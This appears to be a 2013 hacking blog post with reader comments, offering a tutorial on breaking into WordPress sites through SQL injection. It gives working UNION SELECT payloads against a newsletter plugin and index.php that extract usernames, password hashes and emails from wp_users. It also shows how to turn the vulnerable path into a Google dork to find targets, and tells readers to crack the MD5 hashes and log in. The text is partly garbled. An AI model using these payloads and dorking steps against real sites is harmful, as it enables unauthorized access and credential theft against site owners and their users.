Subscribe For Free Updates!

We'll not spam mate! We promise.

Wednesday, 7 August 2013

wordpress SQL Injection Hacks

wordpress SQL Injection Hacks : Another Special Post :-) 

images (65×123) There are Million of  sites which hosted on wordpress. and i already posted Some Tutorials on wordpress Hacking You Can Check it here , so Its new Tutorial on wordpress hacking with SQL injections, lets see

How To use it ? 
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to and type your modified dork and see the serach result the search result will be like this for dork        Reomve the words after iframe.php and put ur SQl injection here ... now the url will be,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here 
Note : The Process is same for all Injections is same ... cooment below if any dobught ..

Socialize This Post


  1. It works only if the user has that plugin otherwise it wont work

  2. NO!! it works it doesnt matter whether u have the plugin or not try it

  3. Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!